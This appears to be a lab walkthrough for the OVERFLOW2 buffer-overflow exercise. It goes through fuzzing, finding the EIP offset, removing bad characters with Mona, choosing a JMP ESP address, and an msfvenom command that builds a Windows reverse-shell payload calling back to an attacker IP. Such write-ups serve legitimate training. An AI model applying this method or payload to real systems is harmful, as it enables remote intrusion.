Skip to content

Latest commit

 

History

History
370 lines (230 loc) · 10.5 KB

overflow2.md

File metadata and controls

370 lines (230 loc) · 10.5 KB
description

OVERFLOW2

Methodology

1. Spiking or Playing with the program

2. Fuzzing

3. Controlling the EIP

4. Finding Bad Characters

5. Finding a Jump Point

6. Generating a Payload

7. "NOP Sledding"

8. Exploitation

Spiking or Playing

  • Opened up the vulnerable program in Immunity
  • Ran the program
  • Noticed in Command Prompt that it is running a server on 1337
  • Connected to the program via Netcat to see the inner workings of the program

Mona Configuration

Place the following into the debugger window of Immunity:

!mona config -set workingfolder c:\mona\%p

Fuzzing

  • Utilize the fuzzer.py script to fuzz the program in an attempt to see where we can make the program break
  • Be sure to note when the program crashes (what bytes)
  • Run the command and configure as needed (Change IP address and prefix to OVERFLOW2)

Running the fuzzer:

  • We note that it crashed at 700 bytes

Crash Replication and Controlling EIP

  • We will now utilize exploit.py

Contents of exploit.py:

msf_pattern_create

  • We now need to generate a program that is a length of 300-400 bytes longer than the string that crashed the program
  • This is because we need to still make room for the payload in memory
  • 1000 bytes is what we will use

Use the following command to generate your pattern:

msf-pattern_create -l 1000
  • Copy/paste the string into the payload section of exploit.py
  • Return to Immunity and restart the program and run it again
  • Now that the program is running, it is time to run our new exploit
  • Upon executing, we should see the following in Immunity debugger:

Access violation when executing [76413176]

  • Notice that we are making an access violation occur on the EIP (76413176)

Find the Distance from EIP

First, we need to find the offset value:

msf-pattern_offset -l 1000 -q 76413176
  • 1000 is the bytes we used (300-400 above crash point)
  • 76413176 is the memory address of EIP
  • Upon executing this, we are looking for the offset value

  • We get an offset of 634
  • Go back to exploit.py
  • Add 634 to the offset section
  • Place BBBB in retn

  • Restart the program in Immunity with Ctrl + Shift + F2
  • Start the program with F9

  • We should get an access violation of 42424242 for our EIP
  • The 42's are the B's at the EIP
  • Take note of the ESP address at this step because it will be used in the next step
    • ESP: 01A7FA30

Finding Bad Characters

  • We need to generate a bytearray using Mona and exclude the null byte which is \x00
!mona bytearray -b "\x00"
  • We will be using the badchars.py script to generate a string of bad chars from \x01 to \xff that is identical to the byte array

badchars.py:

for x in range(1, 256):
  print("\\x" + "{:02x}".format(x), end='')
print()
  • Copy the string into the payload variable in exploit.py

  • I suggest using vim for this part as it will be easier to remove the bad chars in the coming steps

  • Restart the program CTRL + SHIFT + F2
  • Start the program F9
  • Run the new exploit
  • Take note of the address of where the ESP register is pointing to

  • 0199FA30 is our ESP
  • Right-click on the address and follow in dump
  • We will now be able to identify the bad chars because they go out of order

  • After 22, it should be 23 and 24!
  • This means that there are some bad chars!
  • Let's use mona to find the bad chars!
!mona compare -f C:\mona\oscp\bytearray.bin -a 0199FA30
  • Place the address value of the ESP after the -a option
  • In this case, our ESP address is 0199FA30
  • A new menu will pop up in Mona where it says "BadChars"
  • This is a list of possible bad chars

23 24 3c 3d 83 84 ba bb
  • Remember, NOT ALL OF THESE MAY BE BAD CHARACTERS
  • The best way to approach this next part is to go one by one.
  • Remove one bad character at a time by repeating the following steps:
    • Remove the character from the byte array
    • Remove character from exploit payload
    • Restart program
    • Start program
    • Compare using mona

Attempt 1 (\x23)

  1. Create a byte array and remove \x23 from the payload too
!mona bytearray -b "\x00\x23"

Search for 23 in the payload and remove with CTRL + Shift + F

2. Run the exploit

3. Check the ESP address 01ACFA30

4. Compare byte array in Mona

!mona compare -f C:\mona\oscp\bytearray.bin -a 01ACFA30
  • We still get the following, so it is fair to say that we still have bad chars! Time to move on to the next bad char
  • Notice how 24 is not in it anymore (meaning it is okay)
  • Time to move on to \x3c

Attempt 2 (x3c)

  1. Restart program
  2. Start program
  3. Create a new byte array in Mona
!mona bytearray -b "\x00\x23\x3c"

4. Edit the exploit.py and remove \x3c from the payload variable

5. Run the exploit and note the ESP address 0198FA30

6. Compare byte array in Mona

!mona compare -f C:\mona\oscp\bytearray.bin -a 0198FA30

  • We can see from the output that x3c was a badchar and x3d was not one

Our bad chars now look like this:

\x00\x23\x3c\x83

Attempt 3

  1. Restart the program
  2. Start the program
  3. Create byte array in Mona
!mona bytearray -b "\x00\x23\x3c\x83"

4. Edit exploit.py and remove \x83 from it and run the exploit

5. Check the ESP value 018FFA30

6. Compare the byte array with the ESP value

!mona compare -f C:\mona\oscp\bytearray.bin -a 018FFA30

  • From the output, we see that \x83 was a badchar and \x84 was not one
  • Time to move on to \xba
  • Our new bytearray now looks like this 
\x00\x23\x3c\x83\xba

Attempt 4

  1. Restart program
  2. Start program
  3. create byte array in Mona
!mona bytearray -b "\x00\x23\x3c\x83\xba"

4. Edit exploit.py and remove \xba and run the exploit

5. Take note of the ESP address 017CFA30

6. Compare byte array in Mona

!mona compare -f C:\mona\oscp\bytearray.bin -a 017CFA30

We see the status of "Unmodified" this is exactly what we were chasing after!!!!!

That means that the following are the exact bad chars we need:

\x00\x23\x3c\x83\xba

Finding a Jump Point

We can quickly find the jump point by using Mona:

!mona jmp -r esp -cpb “\x00\x23\x3c\x83\xba”

  • We find 9 pointers
  • This means that any of the addresses can be used as the retn value in the exploit
  • Remember, little endian is being used here, this is the reverse order
  • Let's choose the first address: 625011AF

Generating a Payload

Note the address: 625011AF

  1. Modify the exploit.py and add this address in reverse order (little endian) to the retn variable

    "\xaf\x11\x50\x62"

  2. Remove the payload and save the exploit

  3. Copy the address of 625011AF

  4. Select the blue arrow button in Immunity and add the address in the popup

  5. Right-click the JMP ESP > Breakpoint > Toggle

  6. Run the exploit again

  7. You will notice that a breakpoint occured!

Msfvenom

msfvenom -p windows/shell_reverse_tcp LHOST=10.6.111.208 LPORT=4444 EXITFUNC=thread -b "\x00\x23\x3c\x83\xba" -f c
  1. Copy the shell code only
  2. Open the exploit and add the shellcode to the payload section
  3. Make sure that the EXITFUNC consists of the bad chars and not the RETN value

NOP Sledding

  • Add a padding of "\x90" * 16
  • Save the file

Exploitation

  1. Start a netcat listener on the port specified in the payload
  2. Restart the program
  3. Start the program
  4. Go back to your exploit and run it
  5. You should have a shell